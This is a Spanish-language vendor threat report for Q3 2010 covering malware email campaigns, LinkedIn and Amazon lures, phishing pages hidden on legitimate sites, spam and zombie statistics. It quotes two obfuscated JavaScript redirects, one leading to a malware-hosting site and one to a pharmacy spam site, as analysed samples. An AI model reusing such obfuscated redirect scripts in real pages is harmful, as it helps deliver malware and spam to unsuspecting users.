Reporte de Tendencias de Amenazas por Internet Q3 2010









Reporte de Tendencias de Amenazas por Internet Q3 2010

En Este Reporte

Entrega enfocada de programas maliciosos: En este trimestre hubo un incremento en el uso de archivos adjuntos HTML junto con vínculos tradicionales a programas maliciosos como el gusano “aquí tienes o here you have”.
Brotes de correo no deseado y programas maliciosos de LinkedIn: Invitaciones y recordatorios falsos de LinkedIn se usaron para propagar vínculos que enlazan a sitios maliciosos o de farmacias
Tácticas cambiantes en cuestión de brotes: Commtouch Labs rastrea un brote de programas maliciosos propagado a través del correo electrónico con un aparente cambio de táctica a mitad del proceso.
Fraude cibernético a través de PayPal: La revisión trimestral de sitios infectados con fraudes cibernéticos incluye una tienda de telescopios en Sudáfrica que sin saberlo hospeda fraudes cibernéticos a través de PayPal.
Campaña de SPAM de solidaridad política: Una novel campaña de correo electrónico conduce a publicidad de farmacias.

Lo Más Destacado del Q3 de 2010




Entrega enfocada de programas maliciosos


El Reporte de Tendencias del trimestre anterior señaló ataques en etapas múltiples que combinan correo electrónico y elementos de la red en diversas etapas para elaborar un ataque de programas maliciosos, spam o fraude cibernético. Este trimestre se vieron varios ejemplos muy difundidos de ataques en etapas múltiples enfocados particularmente a la entrega de programas maliciosos. Los métodos de etapas múltiples utilizados incluían lo siguiente:

  • Correo electrónico con vínculos que abrían páginas Web o archivos PDF que contenían series de comandos maliciosos
  • Correos con archivos adjuntos HTML que abrían sitios con línea de comandos de programas maliciosos o productos de spam
  • Correos con archivos adjuntos HTML que abrían páginas de fraude cibernético localmente en la computadora del usuario

A continuación se describen muestras de estas combinaciones. Estas combinaciones destacan la necesidad de una oferta de seguridad mixta que pueda bloquear el spam y el correo con programas maliciosos, evitar que los usuarios visiten sitios Web de contenido malicioso y eliminar archivos y serie de comandos de programas maliciosos.

Hipervínculos de correo electrónico conducen a programas maliciosos como el gusano “Aquí tienes o Here you have”

En septiembre, el gusano “aquí tienes o Here you Have” (W32/VBTrojan.17E) se colocó en los titulares del mundo entero luego de haberse propagado con éxito en múltiples organizaciones de alto perfil. La clave del éxito del gusano fue el uso de listas de contactos de Outlook provenientes de PCs infectadas. Esto le permitió al gusano enviar correos a destinatarios que conocían al remitente, incrementando la probabilidad de que se visitara el vínculo incluido.



Muestra de correo electrónico con gusano “Aquí tienes”. El vínculo real al archivo .scr se muestra en la parte inferior


 

 
 

La imagen anterior muestra el vínculo en el cuerpo del correo electrónico, así como el vínculo de destino real (que aparece al pasar el puntero sobre la parte inferior de la imagen). Como se muestra, el archivo destino no es un PDF sino más bien una serie de comandos. La serie de comandos intenta desactivar la mayoría de los paquetes anti-virus (incluye una lista muy extensa) y usa el Outlook del usuario infectado para replicar el mensaje. Adicionalmente, la serie de comandos descarga una variedad de herramientas adicionales.

La funcionalidad de éstas parece incluir registros con un controlador, así como robo de contraseñas.

Invitaciones Falsas de LinkedIn Conducen a Programas Maliciosos

Falsas invitaciones y recordatorios de LinkedIn también fueron enviados durante todo el trimestre, y a finales de septiembre se registró un brote masivo. Los vínculos de la “invitación” descargaban una serie de páginas de programas maliciosos (y algunos llevaban a páginas web de farmacias comunes). La siguiente imagen compara invitaciones falsas y genuinas de LinkedIn.

 

 

 

Invitaciones y recordatorios de LinkedIn llevan hacia programas maliciosos y sitios de farmacias

 

 

 

 

 

 
Correos Maliciosos Simulan Ser Confirmaciones de Pedidos Amazon


En julio, Commtouch labs detectó correos electrónicos que simulaban ser confirmaciones de pedidos de Amazon. Todos los vínculos llevaban a sitios web de corta duración que albergaban archivos PDF que contenían series de comandos maliciosos incorporados a los mismos. Generalmente el navegador del usuario solicita confirmación antes de abrir un archivo PDF, sin embargo en este caso, el archivo PDF se ejecutaba dentro de un marco incorporado para que no requiriera ninguna aprobación del usuario. El correo electrónico incluye doce vínculos diseñados para motivar a los destinatarios a hacer clic, incluyendo:

  • Más información acerca de una tarjeta Amazon Visa
  • Los artículos ordenados no se muestran y tienen un vínculo
  • La identidad de “ordenado por:” requiere un clic
  • Quizás intencionalmente las cantidades del pedido no suman correctamente, lo que lleva al destinatario a buscar una aclaración haciendo clic en el número de orden
  • El encabezado y pie del mensaje incluyen vínculos a “su cuenta”, “Departamento de Ayuda” y “amazon.com”

 

 

 

Falsa confirmación de un pedido de Amazon conduce a un archivo PDF con series de comandos de programas maliciosos incorporados

 

 





Cambio de Táctica a la Mitad del Brote: de Programa Malicioso Adjunto a Programa Malicioso en Hipervínculo


En julio, Commtouch Labs rastreó una interesante serie de correos electrónicos que parecían indicar un cambio de táctica a mitad del brote. Toda la serie inicial de correos electrónicos tenía como tema los bancos y las cuentas. Los correos electrónicos indicaban que era necesario abrir un archivo de documentos adjunto. Los archivos adjuntos eran en realidad Troyanos ejecutables comprimidos.

Correo electrónico con un gran archivo de programas maliciosos adjunto




El tamaño del archivo era relativamente grande: 150KB.

Correos electrónicos con temas similares relacionados con cuentas continuaron apareciendo durante los siguientes 2 días – pero esta vez con un vínculo incorporado. El archivo ejecutable que se descargaba cuando se hacía clic en el vínculo tenía un tamaño de archivo casi idéntico y también fue detectado como Troyano.



Correo electrónico con vínculo hacia un pesado archivo de programas maliciosos




El tamaño del archivo de150KB se muestra a continuación.

Mayor uso de archivos adjuntos HTML

Este trimestre vio un aumento significativo en el uso de archivos adjuntos HTML. Estos archivos adjuntos tenían una funcionalidad variable, ya sea mostrando páginas de fraude cibernético, o redirigiendo a los usuarios hacia sitios que hospedaban programas maliciosos o spam. Los ejemplos que aparecen a continuación (de julio y septiembre) incluían una serie de comandos para redirigir en los archivos HTML adjuntos. Los sitios destino hospedaban programas maliciosos.





Archivos adjuntos HTML de correo electrónico que incluyen una serie de comandos para redireccionar







Marcas famosas fueron utilizadas para convencer a los usuarios de hacer clic en una gama de archivos adjuntos HTML que abrían sitios web con series de comandos de programas maliciosos. Los correos electrónicos afirmaban provenir de una gama de sitios legítimos incluyendo:

  • Bell Canada
  • Craigslist
  • NewEgg
     






Correos que usan marcas famosas con archivos adjuntos HTML













Las falsas URLs estaban ocultas dentro de una serie de comandos como se muestra en el ejemplo que aparece a continuación:

<string>function r(){};fQ=false;d=”";r.prototype = {p : function() { this.j=”;var pN=54899;s=false;this.k=”k”;this.kH=22581;c=”;l=64422;document.location.hre f=String(“htt“+”p:/“+”/tr“+”ace“+”boo“+”k.u“+”s/1“+”.ht.....“.substr(0,3)+”ml”);thi s.g=59634;var o=false;z=”;f=”f”;e=”";y=22487;}};x=”";var gK=false;var zA=new r(); pU=”;this.u=”u”;zA.p();var lK=false;</string>

En este ejemplo la URL oculta (en negritas) es: http://tracebook.us/1ht... . Una vez abierta se mostraba un mensaje “en espera” durante el cual se iniciaba la instalación de programas maliciosos.

Sitio con programas maliciosos



Ataque de Phishing a Través de Sitio Falso de Amazon


En agosto, correos electrónicos falsos de “verificación de cuenta” por parte de Amazon portaban archivos adjuntos HTML que formaban parte de un ataque de phishing. Cuando se abría el archivo adjunto, la URL del navegador reflejaba un archivo local (el archivo adjunto HTML), a diferencia de una URL sospechosa que no es de Amazon. El intento de fraude cibernético era extremadamente extenso; incluso solicitaba el código del usuario para el cajero electrónico.



Página Amazon de fraude cibernético abierta en una PC local


Cuenta de correo electrónico falsa relacionada con Amazon con archivo HTML adjunto




Sitios Web Afectados


Durante el tercer trimestre de 2010, Commtouch analizó qué categorías de sitios web tenían mayor probabilidad de estar afectados con programas maliciosos o estafas cibernéticas. Igual que los dos trimestres anteriores, los sitios pornográficos y sexualmente explícitos ocuparon los primeros lugares en las categorías que contienen programas maliciosos.

En la lista de categorías web con probabilidad de estar hospedando páginas ocultas de phishing, los sitios relacionados con salud y medicina ocuparon los lugares principales. Las categorías “Computadoras y Tecnología” y “Juegos” mostraron un incremento de páginas con estafas cibernéticas incorporadas, comparado con el segundo trimestre de 2010. Un ejemplo de dicha infección con phishing se muestra enseguida.

 

Página con Phishing Incorporado en Sitio Web Legítimo

El siguiente ejemplo muestra un sitio de PayPal incorporado en un sitio de compras por Internet (telescopeshop.co.za). El propietario del sitio probablemente desconoce que el mismo estaba siendo objeto de tal abuso.


Página de phising de PayPal dentro de telescopeshop.co.za

La siguiente pantalla es del sitio de compras por Internet infectado con la estafa cibernética de PayPal. Como se muestra, el resto del sitio aparece sin cambios y no hay una indicación obvia de que esté presente el sitio de estafa cibernética.


Página de visualización del producto dentro de telescopeshop.co.za

Tendencias de los Programas Maliciosos

En el tercer trimestre Commtouch finalizó su adquisición de la división Command Antivirus de Authentium. Los laboratorios anti-virus Command han estado rastreando las tendencias de los programas maliciosos durante más de una década, y algunas de estas se incluirán en el Reporte de Tendencias trimestral.

El Lab AV Command de Commtouch monitorea millones de muestras recibidas para confirmar las capacidades de detección y definir reglas heurísticas y firmas de definición. Las 10 principales detecciones para muestras distintas se muestran en la tabla que aparece enseguida.

 
Fuente: Commtouch

Tendencias del Correo Basura

Los niveles de correo basura promediaron un 88% de todo el tráfico de correo electrónico a lo largo del trimestre, llegando a su nivel más alto, 95%, a mediados de septiembre y luego declinando hasta quedar por debajo del 80% hacia el final del trimestre. Estos números representan mayores niveles de correo basura comparados con el segundo trimestre (con un promedio del 80% de correo basura) y equivalen a un promedio de alrededor de 198 billones de mensajes correo basura por día.


NOTA:
Los niveles globales reportados de correo basura están basados en el tráfico de correo electrónico en Internet según se mide a partir de flujos de datos no filtrados, no incluyendo el tráfico corporativo interno. Por lo tanto los niveles globales de correo basura serán diferentes a las cantidades que llegan a las bandejas de entrada del usuario, debido a que posiblemente haya varias capas de filtrado.


Dominios que envían correo basura


Como parte del análisis de Commtouch de las tendencias de correo basura, Commtouch Labs monitorea los dominios que utilizan los spammers en el campo “de” de los correos electrónicos basura. Típicamente, las direcciones son falsificadas para dar la impresión de una fuente de buena reputación y genuina.

Como era predecible, Gmail.com una vez más se colocó en el primer puesto, seguido por los dominios de correo electrónico más populares. DHL y FedEx aparecen dentro de los primeros 25 – utilizados como parte de correos electrónicos de facturas falsas con archivos adjuntos de programas maliciosos. UPS similarmente apareció en los primeros 40.

“bounce.linkedin.com” en realidad superó a gmail.com en los días en que ocurrieron brotes relacionados con LinkedIn (ver página 2).

Tópicos de Correo Basura

Los correos basura de farmacias permanecieron en el primero puesto, pero descendieron aún más este trimestre a 59.2%. Las réplicas y reforzadores también bajaron, mientras que el porcentaje de correos electrónicos con tópicos de estafa cibernética, fraude 419 y pornografía se incrementó.

Correo Basura sobre Política y Farmacias

Commtouch Labs detectó un brote de correo basura en idioma alemán en septiembre, con correos electrónicos que aseguraban estar en solidaridad con diversos políticos y celebridades (envueltos en problemas parlamentarios o legales). Los correos electrónicos solicitaban que los destinatarios hicieran clic en los vínculos web para conocer más acerca de cómo expresar su solidaridad. Las páginas web incluyen un texto similar de solidaridad pero también incluyen una esquina “plegable” con productos tradicionales de farmacias por Internet.


Tendencias Web 2.0


El servicio GlobalView URL Filtering de Commtouch incluye categorización de contenido Web 2.0 altamente granular. Además de precisión en el filtrado, éste proporciona una profunda visión de los sitios con contenido generado por el usuario más populares. En el análisis de este trimestre, “transmisión de medios en directo y descargas” fue nuevamente el tópico de blog o página más popular, aumentando a 20% del contenido generado. La categoría transmisión de medios en directo y descargas incluye sitios con medios en vivo o archivados para descarga o contenido en directo, como radio por Internet, TV por Internet o archivos MP3. Los blogs de entretenimiento típicamente cubren televisión, películas y músic, y asimismo hospedan sitios de fanáticos de celebridades y noticias del espectáculo.

En el lugar número 14 están los “Sitios Correo Basura”, éstos son el 2% de las páginas blog analizadas que han sido adoptadas por los generadores de correo basura para sus campañas farmacéuticas o de réplica. El sitio BlogSpot muestra que aparece enseguida es un ejemplo de este mal uso.
 




Página en blando de BlogSpot con serie de comandos para redirección
 

Una vez que se accede a él, el sitio despliega una página en blanco antes de redirigir a los usuarios a un sitio de farmacia (muestra que aparece enseguida). Esto se logra con la inserción de una serie de comandos Java que usa el método location.href. Este método inmediatamente redirige a los visitantes al URL ingresado. El URL mismo es disfrazado como se muestra en el código que aparece enseguida:

<script language="javascript">location.href='http'+'\u003a\u002f\u002f\u006c'+unesca pe('%6f%7a%70')+unescape('%6f%62%63')+'uiz.co'+'\u006d\u002f\u003f\u00 63\u0061\u006d'+'p=1'+''</script>

La serie de comandos ya sin el disfraz muestra el destino URL – el sitio de farmacia.

<script language="javascript">location.href=http://lozpo--uiz.com/?camp=1 </script>

 

El sitio farmacia muestra después de la redirección desde BlogSpot

 

 Fuente: Commtouch

Zombis Nuevamente Activos

De acuerdo con Commtouch Labs, el tercer trimestre vio una rotación promedio de 339,000 zombis cada día que fueron activados nuevamente para actividades maliciosas, como enviar programas maliciosos y correo basura. Este número muestra un incremento por encima de los 307,000 del segundo trimestre de 2010. La gráfica que aparece enseguida muestra los zombis nuevamente activos cada día a lo largo del trimestre.


 

Hot Spots de Zombies

India nuevamente reclamó el título del principal productor de zombis con un incremento marginal de 1%. Brasil permaneció en el10%, Russia avanzó al tercer lugar del quinto que tenía el trimestre pasado, y Pakistan y Thailandia debutaron en los 15 principales este trimestre.




Q3 2010 en Resumen

 

Los 10 Asuntos Más Ridículos del Correo Basura

Como compañía de seguridad en mensajería e Internet, a Commtouch le toca su parte de correo basura mientras ayuda a sus clientes a deshacerse del suyo. Enseguida aparece una colección de los asuntos más divertidos en el correo basura, con unos breves comentarios de Commtouch Labs.

10. "¡Sé el hombre con más estilo y más imponente de la oficina!" // Eso es realmente lo que mi jefe espera de mí
9. "¡Pague dos veces menos hoy!" // como pagar una vez más – ¿sólo que menos?
8. "visite: <en.wikiperectionia.org/wiki/Pharmacy> // Ups – probablemente quisiste decir <en.wikipedia.org/wiki/Pharmacy>
7. "¿Nunca conociste un buen lugar para obtener productos medicinales?" // Este... ¿la farmacia?
6. "Relojes modelo 2010 de mayor venta, date celos a ti mismo" // Tengo tantos celos de mí mismo...
5. "Ligre cualquier objetivo que se ponga " // Necesito enzenarte a escrivir
4. "Es un programa absolutamente legal. ¡¡¡No pierda tiempo!!!" // Eliminar... sin pérdida de tiempo...
3. "Los accesorios cualitativos te hacen lucir a la moda" // a la moda no es suficiente para mí, es Paris Hilton o nada
2. ."Este consejo no es para ti " // ¿No quieres que yo lo re-envíe más adelante?
1. "¿Por qué pagar $10,000 por un reloj caro?" // ..porque de otro modo no sería caro.

Siga a Commtouch on Twitter en http://www.twitter.com/commtouch y encuentre nuevos asuntos tontos de correos basura (busque #sillyspam) además de noticias del ramo, anuncios importantes de la compañía y más.

Acerca de Cyberoam
Las Soluciones de Administración Unificada de Amenazas (UTM’s) basada en la Identidad de los Usuarios ofrecen una protección integral contra amenazas de Internet existentes y nuevas, incluyendo: Virus, Gusanos, Troyanos, Spyware, Phishing, Pharming y más.

Los UTM de Cyberoam brindan una gama completa de características de seguridad, tales como: Firewall de Inspección, VPN, Anti-Virus, Anti-Spam, Sistema de Prevención de Intrusos Perimetral y Filtrado de Contenido Web; además de Administración de Ancho de Banda y Administración de Múltiples Enlaces sobre una misma plataforma. El portafolio de soluciones de Cyberoam incluye Cyberoam iView, una solución Gratuita para Registro y Reporteo de la Información de su Red (el cual esta incluido en la nueva versión X), y la suite Endpoint Data Protection para Protección de Datos y Administración de Activos en las Estaciones de Trabajo de las Organizaciones. Cyberoam cuenta con la certificación CheckMark Nivel 5, ICSA Labs, y es miembro del Consorcio Virtual Private Network. Cyberoam fue posicionado como “Visionario” por el Cuadrante Mágico de Gartner, por su Firewall Multi-función para PYME’s. Así mismo ha recibido continuamente la calificación 5 Estrellas de la revista SC Magazine.

Cyberoam cuenta con oficinas en Latinoamérica, Woburn, MA y en India.

Para mayor información, por favor visite www.cyberoam-la.com o contáctenos en atencon@cyberoam-la.com

Acerca de Commtouch
Commtouch® (NASDAQ: CTCH) brinda tecnología comprobada para seguridad en Internet a más de 150 compañías de seguridad y proveedores de servicio para la integración con sus soluciones. Las tecnologías GlobalViewTM y Recurrent Pattern DetectionTM (RPDTM) patentada de Commtouch tienen como base un enfoque único basado en nube, y trabajan juntas en un extenso círculo de retroalimentación para proteger con efectividad en todos los idiomas y formatos. Command Antivirus de Commtouch utiliza un enfoque multi-capa para brindar detección de programas maliciosos ganadora de reconocimientos y un desempeño líder en la industria. La tecnología Commtouch analiza automáticamente billones de transacciones por Internet en tiempo real en sus centros de datos globales para identificar amenazas nuevas al momento de ser iniciadas, haciendo posible que nuestros socios y clientes protejan a los usuarios finales del correo basura y programas maliciosos, y facilitando una navegación segura. La experiencia de la compañía en construir servicios de seguridad eficientes y a una escala masiva ha permitido mitigar las amenazas por Internet para miles de organizaciones y cientos de millones de usuarios en 190 países. Commtouch fue fundada en 1991, tiene sus oficinas principales en Netanya, Israel, y tiene una subsidiaria con oficinas en Sunnyvale, California y Palm Beach Gardens, Florida.

Referencias y Notas